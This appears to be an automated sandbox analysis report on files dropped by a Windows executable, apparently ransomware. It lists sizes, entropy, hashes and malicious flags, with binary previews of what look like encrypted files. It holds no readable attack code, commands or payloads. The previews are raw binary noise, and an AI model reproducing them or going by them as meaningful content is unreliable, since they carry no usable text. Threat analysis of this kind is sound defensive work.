              Preview:<?xml8..,....p1{.x.... ..rk ..K..I.D..ZK....~l....jr.K...........:..Fb..K...}.V_.3.p...7._.;.(.xw..~.Ap<..}@..E8g..............".w.eJ...........UCT..,.'.r2.FIqs....rR.../f.1....."}\......mI..........y...\.-u.).UOR..e....X7Z..>..O.z.U...,..V.2".).!...Z..y.=7.}.D..FN.h2...........:.*..`V-U..nKzn.......Z.....C3.C}-..U...H......N:..Th.!....4.<;..l4.Bs.-.)#_Y..Y...f..8m... z...f....aL"s...8..)...\...._.j.).6xC.o.I...!r....=._{8..97.7...u...O@.dS...LtP.{.}w.eiH..".......?.Lx^...V....f..+.K..T...~.K..].H......(.....#...^9.......O.P...8.....S..=Av.k..m..._.T.[...<>...4W.>. .~Oj.t;..@Q...)...`7...%..@....".K<.!...).....*.!.A.H.zD.e5.H:...0."..%...Q..F....1.*...T|"/8`......>#C.$.}.....a....8..~.-.(...2].....I....H2H.9ZOw...2....d.zB9......K.....i>.2c'.Z."tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):726
              Entropy (8bit):7.695060013573619
              Encrypted:false
              SSDEEP:12:tJuIrUZGBMTQTXPn/qZDGzQJIunJvJC6p1UXkfejXGgdKLUKoVrLc8IVcsukIciD:tJXUEBMMT/nUGzZyJvJz1SFKLUBrQ8RX
              MD5:E5B99FC02F63B517C90FF25E6143E25D
              SHA1:F5ED95BAFFC4669EBD021CBEA710CD49E212E887
              SHA-256:D5DCAE9E6C508B92C7A79187CA89A77755E369C92EBD48B246279057F83F7238
              SHA-512:B04D25C21D7AA954F7E6089792628C16EC1B7086112761DC6E13357582A47F2CE3123A237D34AF34A34A26FBD366A4B7DB56EE74F847527C40A0528A03D639B8
              Malicious:false
              Preview:<?xml3.i........y..e3....L......W...Dq..5.z$dz~1^v...<..L..z%=.d...<.d.B.....5..Q..2.#...3.....+.,.......e..3.p...V.......^(..R......{............W.g.......I5x.I.7.fX..........i#Y7.V.x./.S......4.A...T....R...}..Hi..d..]jo...Ic*"...@.nO2.....[tC`.1.9O..Yg<...........6-.....4.S)O.+'&!$..........DO...D/>....TVL~..&..W...';.J6y8.E..6.gg..K.F....v..ytm!...F....5.K.F...7..:r&.e~..G..............c.d..|..#y......J..Mp....[...-...FN...['u.&C}c.S..a..-^{....?....\s7$.~...yi.!..yp...q....w..i.:.3.2...bR:.....a%S.. ...Y4fSid..w\..i......F)H..1G(\).Il.M.....6...Mn.........../.......5...W..|ef.)..BL~.[}*C.U.."....9a.....&tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1686
              Entropy (8bit):7.885055877455205
              Encrypted:false
              SSDEEP:48:HI9Ellt8KvmgUYLd6D+/eAlUOsSK7FLHuVVf5D:HIEogUYLCVOoWVfx
              MD5:A899AB2784F6621D6EC0E96AA981B696
              SHA1:82C2047350C4A9A4026B48CF586B0AEF17E00E10
              SHA-256:BA7BE3B8F9178A774AF9FAB71A18BA89A612F131F1304F3C8DD3F2C7EFF16F6D
              SHA-512:DFEA257DAAB605A87BC1445C59F32510D3238CBE3ED1096E383B824DB3F9088B76EBA934C6EE2FAEC13662AEC39C94B99DE862D0AFF274F87C39BCEA35DAD9BD
              Malicious:false
              Preview:.<?{......]IYT<...;..m....Jo....wQ}#.[.._L*.f..{.",'.4V............v.....m.....I.W.W~...BP|.aI.r.d.BHDf.....V..7..q....r.)J....jF..zW.....q....q.....*:4..YA.[.0f...8:...A..Q.7e_..W..K....S...j.].2-7K...s..j..k....s,.@..m&3.r....a..;au..ze....t.Y..5.J...g..#..k..vZ. ....{....+.*.....z.".... .._......_G..Rt..uW...~J..0Q..8\X.J=:.e1.k.m.g+.7d....#......q....+ ?.a.l..#.<.i"..b=(.L.s...V..L..9.$..... ..7O...p...Ys*)!5...3.K.....:P&S../.....Z.....".wt....y%.....:....r....','O.....rj.B..`(.}S|\.G...G....k..msG..m.bQ...O..%L...0^..!...C..!|..Q.^.:R8...5......P....{.8......c...T.w"mG..+.!g.x...Ag..&Y...;*h....x...kd.....U.w|.s......|.q.YNy;I%1...P..y.g..>....X..>/1".e...?g. D..1~:.c..=.nY..!.k.^.x.E..}k.....O&....6...A..Ay0g.x...x]Q.s?.-..2=....Y4<..]t..q...q.....xKJ....'...3.../n..[8kJ..DbjE...M.....jU..,9..v.Mq+JYc.JI.....Q&<..t .&..r....x&..;.Utv...A.........,...'...SBzq.*.d....cE^{._.".f@..[....K#....G...F.. .b,,.....,..(..~.~..(.....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1723
              Entropy (8bit):7.880759087665489
              Encrypted:false
              SSDEEP:48:L94QaDub0SUe4mbXlbQKpDrxbUvRsp4LoG3PD:L94Q+ub0CcqxUvQ6F3b
              MD5:A966B015DB74017CC39B7B8AD660055B
              SHA1:1A83939F088812E687973B3A4C4B0DE3E67989CD
              SHA-256:0E29C7BB59D0D20DFCC1397774C0FB6D88FC3D6E3A35AC87F3C5A15262E850EE
              SHA-512:29AE950754E89F0326871F04082B209A4B4A7D24E1EF01C74B0E3EA80892DE1E3BF16067248A9D4047DE282FEFB2C97A665448397886B79B3D1904841CAA4373
              Malicious:false
              Preview:.<?.n.......>..r@.e../Q"........z...:..H..P..<..s?.1...S.......H...QU....`............C..H..L.7.v..fGMr.#..i#r.X...n..9.MAyT.b.......nH.......B&_.)..~e...t..)oq4G.^[#6.2....J....2<0.?..]V*.9,w...<|...>..=^...t .?.\}`..^...=-....8...(.c....`I"..J~%2.z...ka."/...).u..9.x...-_5-.}.j[.Sz23Skm.+aqT\.Z.....I...E.y.$...`.U...VD..kU.....LG.NuIU6V7....4C.....v....soyr..`........<r%..+y.e%.T..H....xCJr..e.....C..{...<....0.{Ywb...(..v1......{.......P.0.;..$.M..O..r..ZfZ#~.c3.W&z...0...\T\....^..5.r....vx.,...K6.]QM.W.{t>.K.\.A.....k....P.a..+......5....b..C...M6.....Mgr...aEk|...L\1.N..c.n.r..l......J.w.*...'1"g..v.D..E.I.U....Cr.!.y.....k..o.....[.R.}...44...u5oX....i."n.,3c)/'.. .&.KK..e...[.E.*..S%6....72.......ld.....D..}@....`.\x.S.H...U..q...J..'5..j`.q'.S.....8.,...qq.........^:~.e3..7.\/g.......=....:LG.zd.R.k.cS......c,.a....p@W...=....E.."n.aRo.lp....8:...g.5..>....A.`4..h....$.hb.UZ.r....0t0.F.W...)'..7...._.x...:..h.H.]...z8p"..a....B$.).
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):764
              Entropy (8bit):7.7470002787130765
              Encrypted:false
              SSDEEP:12:hboykCXebVkD/FtzXHJseDOvgzB2AovqOqzGlsETDIUZ6+R4WxFRVQ2ZMXJVkjpV:Noh36DzzXH2FvI7E5g+RDVQLSDXwPyGg
              MD5:7581F7F19BB713AE88618B93C6DE834D
              SHA1:68D55E758544C8120AA66ECC6A2C49538134A78B
              SHA-256:6317F289922965A2380528FB14218C7359150713A94B4D40BC3C83D8ACE721D9
              SHA-512:63268F267CE2659FD4942FA83164458CCB79C98A378DDD4F5565B42A48E204761D3D18F70302D51D7A6F4271AF3A81958352E22BC0AB81F4EC14F4566B8F1C8C
              Malicious:false
              Preview:<?xml.t.oS4......|..,.o.e...:.-l..~.DY[.]?C.y|.6.._.....<...........S)Uw...5Vn;+....D..3..UZ.T..T9;.}.....(tn..Y..&7..P.r......./.$..A.S2..[....Z.....:.............`.........|fE..]{......W......*X..U7Bv..Z.X...^.$...u...1S..}. ./.n..~<3........C..%...&.".J...^H..=....-G...J....k.\mf...Oi:m.8..qs........U#...}s....d-..y.!j....%........2..c/.............D=l.}Z.'.U.kM...dDm...hY.~.l....@..z..C.....S.?x.f.Y...p...1..h....vV..Z..mM7..`.. ..w..7.g.`....h7..$.....'.;........t.T...u ...E9.tw.w.>.1.l\....$4.."T?....HZ.y,...L.I'..V..m....*..{.B..,.........WA.S|..0..8-P..c..K3}(...;..j3.....D./...`..b...K..2...M.P.......X.....d..=<...k"ns...L..E.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1692
              Entropy (8bit):7.865118804882031
              Encrypted:false
              SSDEEP:48:RER4WTPgEqbxEHADGQ8JGGU78bRBCsiqe9dLMOgtJqoBqtD:yR4soE+xEtQ8Aj78bRAx9gtJqlV
              MD5:34EC6D92E606B824B4E8350AA971D3ED
              SHA1:D8F239AF0160F905294CCAC055F053643E07E2DD
              SHA-256:BF4D2442FDD90B3DEC1277599CBBD11088614D617C23B910BD5D5533B3BA82D3
              SHA-512:2A1FD07EB53BB1D320FD4746ED0EAD0DED99A706870D2F60D88A43C8A5C53EC68BF6191D9EEF7411A8FFCB43F814EA62449915CCEC8ED10D2C62643A04E11532
              Malicious:false
              Preview:.<?.c.$..~U...O...,q...h>I.$@.%../...l.. ..@..X..z>..k.3w.Czm..E.dd.j..xg.?9.55erZ.U..P.m{>:..d.-.Q/BL....8.T...x.....p....DQ........F.S/...IUy...........EQ.6...6..4.$.ni.q...b.O;<..bEB[V.....p..O.^...J.....<x..Y.....1.>I.......e.............$&6.c..........<t6I....,.N......E..H...w......;."g.=%..n...K......Y.S4....bD.;...#%.9.....I.....{.bh9..../..(}..).}9.F..GS....l.T..E<.....&.Uu3..!.....)K=x.C..1l.G8.NH8...u.......B{..*k:HD..v.....b|...q..P.b;...]...=...7.u.n.o..:LV..n...&.2....k{.S.Z...kPW:...,)....5.'...Q.?....k..:q.cq...iUr.-Vb.PM..Di6wC..!....&2........o.........].....u.i:.".s.....>.p....zs[.hx.\...<B.\.ST.Y..=.wk."..&.=O8....G....z...v.T1}.b.....r..J,..#..M.........F.q.F.+Ta.^..S.....f....',.D.$.A.V7.C...(~!.c.\..MV.0^.....4...@G9..h.*.H;.......O. .Y., .;2*E.k..7....h.#1+.C..I.ZA.w...$K.h ....#.|G..{ri...U.L.....H...4....]...5.....}.7...C.._/f..........".5s.....>2{...?...5.DS.YD.y&..!L...*....=5..8.+..N......01.].e(.y.......H.[
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1729
              Entropy (8bit):7.910750186646166
              Encrypted:false
              SSDEEP:48:mvOYBqcJDXYQo9wBFwXorrT6rXi+ul5lQXl6xLJwvDD:BYnXYQo0HGXi+QIV6sH
              MD5:B4B7E1B44F299384B20D168861F4C597
              SHA1:AF38176601004A98EA4BB24F09CBF0B6F35FDE60
              SHA-256:8557DD2DE04E7D194974163BE3BB951A27C72133946CC40BC4A168957E570255
              SHA-512:F7217D0FED57A50F4C30B4E11927921AE46007445ACB1B956FC2A369774FDC26E93BB9FFEE47AD826CF34797941A4206DBFD0960EFAD0A4ACDA61D05DC76AE3A
              Malicious:false
              Preview:.<?.....%...".}S.-N,....&/."*.|f/..........K.9.MSB/.J.@.N..{G~..g=jH...$.H......Gwt..M.:h..yV.Z........l......yu...h.X{...:.......D...[GL....v..C.OBp.3...|........`.'A.....x)..ppR2..S~..F..........(1.._...C: k..pnO..k.(4r...y.(.e..C.Ln.|v.[ ....#Z2J_r....P.....R.5.X5.&a.q...A..d.=....4..j......0.O.R..k.:i..^b.0.e......2.[4WFd.....Q.......cOD./...u.;.=.F...H...1..m..]d.%.\.=.....,.dH. 3_.G.J..#...6.."m.._.W...._7.6G".....).C...ph.....)*^..N.\"........B.k...6G..lX..@Q&...*. .......lRO..~........N.}.)[o5....&...w7c3o...;........g......U...Fx..q.....0.')!ZsZRS.....+K.=..N...I.._.u..&_..p_-...vZ....Um..Z...I.^.].<......Ws....[SiC.e.....(....F6...4eW..#..a3.|1.8XRn...1.G...[..#.'M.y=..f.+...8. s"0.-F..&...B9.........=.{........Q..Bt_]..._1...........H-;pI,R...H....n37Q ..6.S.-...P..w."Y..k/.+..a./T.{;.....p2.(...%..RdME...[z.8..E.f/...|.p....^..E...-.NV..3.^....<....,k.z*.....}.../.z..\.....cD. ..;.Fb.....K......T.^..8-U..[.-..+.?.e..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1696
              Entropy (8bit):7.8876068443879905
              Encrypted:false
              SSDEEP:48:QiMU6wdFG07Ho4P6p9VSS/Oh0AT9HwI2C9JwnmmcD:5MUd807lyp9VSUOh0qwI2CL0tY
              MD5:FCF4103A06158BE895303BFD1F6002B0
              SHA1:173EBBBE06B4B422049B389AC66F9877EE25CA52
              SHA-256:FFA0C10E2BF70359C616A2F99934716F96ECEDC64E547FDC0908DE5B605E39E2
              SHA-512:67CCE95A35FBD4C5A037887E7B41763F5D8E2BB3B12A368891B0EF3E5494A25DFA932BAADEC1AAA6E5EAA5A00CE5861D1BF8E11C7F31E2105E5B18B41AD44279
              Malicious:false
              Preview:.<?...w.d.J....W..|.G."..{.Q.D....G7../b..j.8...{.Z{....#.5~.'I..HC......a........??.}....}/`.....!.3.G......8..>.'lMX$..SY~.......FP.....A..5..O.,.......v7.,sY...6.].?.B..~-....>)..2<.i$...0V.l.t. l...?9......>....#i..._a...qT....7...O.U^...(9C.~..x..`i...Bo$..].Q..:S".O!...h...o.1#-.A#.....@.}.Y........L......x....9[.vv...].....X.;*!..=COgJ.E7..5....x.V...W.9@VD_.M(...cS..hlT.mL.=S@...?...ok.:7.<..,8M+;{..L..i.....i..3u....&..Hq.S..9........x...,....^=..o....R.t.cGb....s...e..D)..Wp(U ......E.b.....V...2.../...g..I..!k|.....+..EJ.....e9.HO.B.?.D..6....N.;=....s...'..I%...i..U..\;U.....Te$.....Q.........;....d..+.1....W..j...N....|%...4.,.].L.0....b..:...b..uM...$...f.I..h..D...$...xvg.}[..$.J....,.V.....}..h..../.. .<..N.=..V........A......g^B+...x.&;.n..a...4e][ ...U .......6Q.....%.J....?.f......0..;..|s..^.{..xc..*.'PV./6..8....d.. .gj.R...@.t.......[....~..q.&~.........c....0.TX*.`....sx.UBh6..........u..v6....$.Z....:Cq.....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1733
              Entropy (8bit):7.890178393238576
              Encrypted:false
              SSDEEP:48:dtzYr4d47vtpE2VXmFzd/hBzXi0/bOdN6JujnmD:dt/6vjazdJB7Zo6B
              MD5:4357177D5A20C3A8CA127A473ECA56F3
              SHA1:3D999A808F1A42B1AEC2E00D9AB6DFC67A2B5476
              SHA-256:886E1D4235DB3BE21B17D22C6429E5848586718A9C15092EFAC36780AA9E2E25
              SHA-512:4E0B72F517F48CDE63D22C1F6E4D3822FE9634486D9FDB68F363BBFC14C5A5B61D14B6FBB549954BBB1F10C103A2B986068862212F5D8396321EC397BE912F85
              Malicious:false
              Preview:.<?a...=...v.] ...W...q...A}.m"...(Q.y.Yp..?T_.t*"D....7.3..e...o....$. `.\Xs.H4T..,.......m..j....m.(.L@.x....k.F.=E~~..5...E.4.B.,.ci.Q...'.....O.)............Lk..'d)-}...*G..[.........h.........t;.5Z......0.$..vgZj^.....7..C...<.(HC...V.A...x(....7.>.l.\...g.K.....F)......v.?z....3.+;{.t..p.{........<:..j.E2Qg...;...05>...6.U..bXI9..<..d..z@I..l...5..}......v.W.....o..}.p.(.*..>...#xBp...yO..H..#)...I.<B..^.,+P..Gz...a...V...".Z..'+7.[..K....M%...\n....o...D.A!..?A~.B{.....|...q....LT.)"...Ma..cs..d...Q.kf(.Q0.b.....g.'..$[HY+.i...5......_6w.W.3.?.Z<.;..\A..@..l[.CO.caG....G.k.GueU\.[..Y[.$..l..........;....|._Q.J.j..A..u.....\...j.w<....{hG...1<..k.....T.i....=.r..!BG......j.s..J..S.3.8,.[....i..Xyw.+...Z......q...Gg...LN.P...1`UP........~s....B.Xc..5.4Q...`m..Js.....|.......6U.x....D....*.Hz.R.-....g..J....SkJP..X......)........|S.w.Vm6.&i.t8.8#p...lT.................6@..9.\..$5%.~r6...N...c..E..wx..W...Z..d..p9l..W..E^
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1690
              Entropy (8bit):7.88347982903687
              Encrypted:false
              SSDEEP:48:zjD3iiNlgbjyYgrOzXzR/rbrWmJ+1O7pXPD:nWR9grOzFjtU1A1b
              MD5:6AFFFC2C0E9586D786C20765E9DBCCCF
              SHA1:256E455A305FA4D7E4458489886F46D37C4CCDA2
              SHA-256:2C137CE0F4FE96189B232E805FA6AD1FC5FEA21BE13801560DB2F61A9528354B
              SHA-512:7F0E4D57AF53AA5AC24D06CED22325FFA10B6D81A7D31A7CBB24E2D557763C16ABBEF8A323B44B73E875C875AEFED2DAE5B160E2973BCD911C22E3A9FCA29396
              Malicious:false
              Preview:.<?.{..}*.X...Nv.F....x..,.B7.`.oE)..q....;......dd.#....>.>.......H...n{....S.h.....`..-..,.....k-....&.C~x.?..,Z...?^!w..R.c;..w-.C.....p*B...Q+..|Z.:g_+XN..dv..9]E~........ ....6%.mW...S".!.......uB.6oV...Z.q..ps.q.)..............?a...ti..^sb.J....A.2_..t...g.C............UX.....Q......81R.HC".U.....6.Gt./..n....U..N........~}.7.@.. ...[$.n.b/...t......ua}{u...h..`..K....F!.}........_...6..B'H&`...V9....c1O...*...r{....y.N.....8L#..N..J..$qv.K..^.......Kr..%......o_....yV.<X.....~..h..q<h*....%..W@)>.{t3.'...y.......D..{..{.oq...."..T.] >....,m[...Y.....'..j .L....M....^.[..s.......Nk&Z.iK..$....(........%.-.N4w........;^....?~*...&;S.-.L..Pd..P...pT...I......f..u.h...h..|9.Y.&.ue-L.....g8..........74).W...a...A......[./..l........$.PFi...G.........R..,p....+||..L]..d...I./2Q.Zd"...Z.L.j.....o.`..K..Zq..u....|J..:.....+..{.......f............f.+..!Y.....6.H..Jt.../\.._...t....8.<j.h....H.".eAL.[.5...y.....$..y..TC...^YI.z....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1727
              Entropy (8bit):7.887130249383115
              Encrypted:false
              SSDEEP:48:X4mh3xFPN2YszT1OEv0OPCsGtw76z8ZXE0KoLLB/D:X4AxFPWzT1Bv/CsGi7AWS6V
              MD5:BD3A4237C91BBBDFDAEAF5764DA721C5
              SHA1:C1F8DD4C02626E3BE9166E9C950ED557CA6EA594
              SHA-256:639B20D66F22576D62AE41D590536CEE75FDD33C27E64D67371855A41CBF2E84
              SHA-512:E635E559FB83473F1C57D3CBA57E4195EDD8B84F704C1C93DFF027D8A934473583A00CD2F0334932F7B222391A47636F5093EC7A65A414812949FCFAE9E6B919
              Malicious:false
              Preview:.<?..S..^.}..h..tm...J.j..E...N......J....C.....$s.t&Qy.`......aq.y.X......`..@.Ac.....h.q.X.[.\.gU[=.~._..:.v]p.{.*T.".:..7.....#,.h3.....A}9v/...&.6.r[(F..[...o.6......e...8..g.s..I...)..............7P.......:.e......x...._........cG@...J.3...&....}o.?..11........6.....?......&.y....(.95...?%..hL..L.....ZQ.Dz[{..r...`.K6.<X1..^L.............V<..L..e....f!h2..L...D...$>..{4$...M..>.s.0,..7s.>JE.E.....GvL.X..Z&....."..V..D.x.F.Y-.Kfp+.M.pn.~...3..)..`1....b...v-.DO.i.If$r..M.5,V....(......A%.Ux~..V."..w.d_.t......Z@.."..$o ..O..)".O?...V.4...R...v..6E.r.....v.....{..4.0..l..Z.y.].{...b..P...g...~#..../....7?..M..R.fD..Q..u...,...TP...N.}.K.......Hg<{..\....H..M........Yw5.}..i...M..5....d.....x?b.;&...4O[.{i.}.K{jDz...<.....`.Wi.;Cd*....h...+.c..uB7|.RI.,..p.a......hMj.....m.v.s./...3..<G..K(.. a4.......`E.7.7.~.?6...w2t..J..n.A(..5...L......sU....L.6O-...]..Y.....H.zCxu.)u....:./4...N.X...].-9.)7'^L.. y.}Z.......- .......Y...;.m
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1692
              Entropy (8bit):7.88465080358673
              Encrypted:false
              SSDEEP:24:tx65XCx3oAQcUv/fpKPWlo6M125hTwyJIftLwKPzsqKXNWXSUTEIqhaebD:SC9Ghv/RKPOOnySVPAqKXNLAEIIrD
              MD5:FEB62850A6FF2B1DFDD72BA0D25A7D6E
              SHA1:FAD72B553BCFD67F7E2A49E718F36EEF16B4672A
              SHA-256:1305AC859581D85659924CECB6C4382225A1FA39094FA41BE521CB145D85ABF4
              SHA-512:5BACA6E012347C9DDDB497CE192183073743ED49B47587E82C556809A300CDBC545B0F868CB6A0908352EBC0CE2D3D38E081EEBED53DFD12B482BDFAF2A425EC
              Malicious:false
              Preview:.<?..T..^..].....x.lU...........Z...4DN.$r.+hK.5...@^"..0`.U...vr..NxR+...=.....o.*.T=......!..f.@...BrL..Z....&...H..II...l.WG...B.TT.{.Y..F....(...\F.u.......G...R%}.M.j_.T............A"h=.O...QD.$U1.L.$p....)W.A`X.....:..s.......D?Vap..?...n.F.b:.......7.7W......=..w&...`T.......=Z.D.!....F.>zQ.b.Mg..L...F|f\........g1#...0 .n...........^...........h......g.....9g.h...k..X.>.\.S......3n.yJ...K......5"d...F4X"%.,...-8.AX..8..&%L..LM5..N..,.b..@U....wl......".v.J.KE_^.x..Z.7.+1....]'V..K.e.....#U-.],.o.mx.%,...Kp\.]^.{m...m ..u.y..l.U-i7..N.h...../\7.1....7."5-......)1&...A.....[.>.t.?..n.3.Y.m..:.=.FW..W..G......;..&*B..D.2....&A..I.....~6..F.Ss...F[.Z....&,.,..eeR..3....C....C.."s....b._.....Z.......N7...T]s.vTP.....v/..rx}.qa.bV...PC..-.p....#W....R....p.R...&.....:F.fp....n.....8..A..d.[.eHj.V........2.=.j..K.4.....%..h"."|N.D..!.~SC3.....j.4.....w..z..#..f.."...;S..B..k.....%."~..1Pu...*X.!B.t..Yk..D7...=.:...4.....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1098
              Entropy (8bit):7.818965691997675
              Encrypted:false
              SSDEEP:24:0Gt0zJ72TTj8eYHqRyOheADpnexzApE7RmpoPu+g1tmr7bD:30zBSTj8ezRdMiepAOtmpsufirD
              MD5:14D3C308348F3650D52FC8600652B050
              SHA1:C57409C70B13E3C2FFD4A817DEFA167E31A84F3E
              SHA-256:31258F812EA09984556019B8C783D9FE5B9B53BA394BDAE22F35C9BB379CFEA3
              SHA-512:6D05A080D2D73E18C4E64CC0D78E44EACFA79AF27E5C22E6C01782681DCC768A8612B450A6B758F1AF0EE34C6BE432FE5D5045DF11628B3093C77B3A2C8EC902
              Malicious:false
              Preview:3.7.4....$CvEc~..vl..qSi....f.vQo.g.D.k..^a{|..<[I..h.o......gk.*.n.......+.`..W...N.F{..S...fQ-.0......A..)Zy.C....Qzw....+*.$..[Ceg.......(..p.7K...^...2...G./=......mu.W..!ZJ]*}... 99...%.3s...z.E..1..3....]3+....8KS_...s.yP%8e.;...../.(.....iLXCVr<l..W.kM..n_..Sq/?Q\.I}O,...d]r...|.`.a...6.H.....l.em.....b....8........2..N.............(48.gz..x...D.&B..]...7.G.....H.@}7^J|."nDb`....8..i.y.Vs......M.t.M..eI.X.N.{P......=..V~.y.P.P7o;.z.,O.V:v..\.z..x.-..36..6.}.(..%.}{.......C..|.-..H...K!..[.,9.....)...9.J..j..4k.%.#....!..S......<....)..+..{......9|.....e.....[.h....{.ZB_.C(-.n'.C.....F.h..qA.7.P........@;&sG..?..u.v:.9.....w....Xm..Uw....xK.Y5.0............]t`.9....$9/........:.5.2j].Z.fC..E.....C....-...*k.1.K.z&.A.....)Q|...9....9..3/.....2+.2.2....H...c..G..n.6..m.1X.f.$.s.....*.(e....R0j S...h.....b.n.....o...l..<..5..@..E..R..r.....O....#....-..o...e..\........]^....WZ..>..2..-......J..@.>.^.i..;..m.|7..X{...}.:.@..4..@\..?
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.99275977369084
              Encrypted:true
              SSDEEP:768:29w3qarVl9Yi9NNRe+lktlO4EvGwr+sVQ:H6avOqNPN6TO4E6J
              MD5:7D194AE6B24A7B0ACD70C6AC1B92B1AB
              SHA1:C7A98123980F4F94515CFA554552CB862750614C
              SHA-256:BBFE8D05141C96240E0BF071D93E12E134FD4227CD20984B48D28BBD193DAC05
              SHA-512:D6DD13576E815CE1CB36469E96DF9762BC7D868E6297E9DDAB87F63C212A66A62BD856E00BE5A16B8E1D43385E4EE9ACC0357ADDD2FF5A5530CFB4D970B38B47
              Malicious:true
              Preview:SQLit...............w...L...........J..1.s.@...N.U....$..3..j..$......p.&.<.0jgF...f.._P....6.ko....NH..m.......2.B}.3........,=.O.F4...$.........6n.......b.....pJ/9...F.|..^Q.].v.4..5.`3...*AI.U|......W`M...,K...a..|.q.l..@B..f....K..(..~4..z....nyn.i.V...W.=..iJ..6.!./.9U.a...-5e.$..rG1...I<.y.. .....'....H..I.w.?.K.E.%L..cSi.P..a..m..}q...W....z>l..:3|sO...e....r....7..{....]..c..C.C...(u..[......._.....^5d..*..%h:.....3.'...}Fm.......3.L(..q...9...s.q../7.....1.hx..'!.-78..D.jj(A>..S.S.....mS.....U.d...D.:3=....f..0...)).#^.t.LP..o.3...Q.+p<..=...uo.]....!.kE....K{.....b..W.n.n.)z....o.z....bW._x.W..&.P....g.<...C.2V3g.w.1..+....5...7....7.r..Q~..,..3.(..F..\.Ji..5..-e.rD.-..k......F..?.~..-...!.x....W..!...h.e.OWI..A......s.bf1......Q..>.. .U..)m._~...O./zj.(.r..X.9..$.}...t..R....8y.I.)....m.......o.V.D.N..{?w.X.}u.~.....,...4...,..A.i@X+#(.,.aN..N.N.k?...l..g<......U~....$x..t~.)...T^....k{.e..|...4.4..|..,..V!.....m..rD....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.992766708707924
              Encrypted:true
              SSDEEP:384:HJLdpN/Xxp8dryaoilDOHC2cvL46HjhgkRtneUDDfd0xdHl52V7xNz8lOjuhqea8:pLdpJr8Mgn2cTLFpfkdHfENeO6hqea8
              MD5:F1CED5911AA95AAE2DCC26D764E50B00
              SHA1:9A9CBE511058A793B6613E286D0FA99B92517830
              SHA-256:FB6345AC8C012BAC163F5A98B2A35BBAC3708CCA89D67B19C1A3E468B5DE2131
              SHA-512:70D93AABF29FAFDD573619473E1B32E973C25A98F21DA1FDF532F4524F35A02C880A1D8ACB4208E6F99C82B73558F4404CD4EABAA3EED0E92F00001A2150E170
              Malicious:true
              Preview:SQLit.....$cW..K..T..../...s.h.y.OE+..<...W..6...7..#.L......0....^....../o..L"..&.J..S....R.Q)..'.,.....f.....U..K#...T...K.hh1..q....l;'.....>+L,....>.h@..Z.p>R..A....O..WN9i..?...e.Y...R.......zc....._.DT.=..T.{t..5.`...G?z.^.W..<.Gr..5W..Z..C.y.b..y...Mr'l..d......GZ...Z.R.<.=.G....rF..I.......[T*...4...../....(..M....m....4...1k..../`....qC}..^.E.q6L{w:.B.%.M.7.(p2..L.......Lj.~{...[U!.Q.q.........k.JKu..W..n......D7....F......*...O.?....D3"^J.@:....G1...b..l.......z......e.c.x.].A..=xS.......M&]Q.#..8...M~..Y...r....B_3.<.hg...qS.>.V....lt.8.j@...]IE...%..&..im......\.l.6.Y...s..l*.t.I..SY.gc..pt...@GH....tU...7...}'.5.. A.....|M.8*"..\q0'SB...+.F.1F:......a..W..R.#....j3..5*...b._...&]...S...u.Le.0.....*.s92.Y.b....r].".A/......b\D.*2......m...j...-t..N..r.....xij..y....g~..e.+...M.S...Z<.H.5...D.k.pj.Z%.5.W..g...o.=..^...bn.)5.p....j....u.,..?....h.& ..........7K..Br.@.P.`A2..dgnz.$-f...f.Q._\...{...}"2R....}.TJ.w...M...u..`.=.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.992222812835984
              Encrypted:true
              SSDEEP:384:qVy1rHLFDX8qdwMfjlwgLZAv0ijhXFLVJg1DQmIJq4KlO9XYnFL:qVO/FxdXlwgL0NHrg16wyXcL
              MD5:240D8BAD74C01C29A61AEED6FA472AD5
              SHA1:BCC0F2F03FF7618A72A503E4C9ED08E1D9D6BA98
              SHA-256:C78CE63C08EC97CB600BC28C29645BD3F04A9BA4C35041E9F0CA8819862EAF97
              SHA-512:B7BD1953750EFEEDE0215BA4ADB89C4A2C2EFF5A48B9AEFBB65328936A9C54686B33B4D68F6A66D7E8B93C4ADF4E70AC8B0CFA9688706B7611443A9E32D162F5
              Malicious:true
